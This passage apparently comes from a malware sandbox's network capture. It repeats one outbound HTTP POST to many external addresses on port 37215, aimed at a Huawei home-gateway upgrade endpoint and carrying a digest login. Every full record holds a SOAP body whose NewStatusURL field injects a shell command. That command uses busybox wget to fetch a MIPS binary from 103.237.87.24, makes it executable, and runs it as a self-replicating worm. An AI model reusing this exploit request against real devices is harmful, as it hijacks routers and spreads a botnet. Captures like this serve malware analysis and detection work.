                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1664192.168.2.1341672157.205.124.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.516760111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1665192.168.2.1350786157.32.133.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.518831015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1666192.168.2.1338166157.183.18.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.518870115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1667192.168.2.1348842197.32.242.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535053968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1668192.168.2.134273641.202.93.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535095930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1669192.168.2.1358130197.181.162.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535095930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1670192.168.2.135063818.237.162.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535099030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1671192.168.2.1340302197.122.104.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535155058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1672192.168.2.1356602157.88.13.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535209894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1673192.168.2.1345414157.103.243.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535212994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
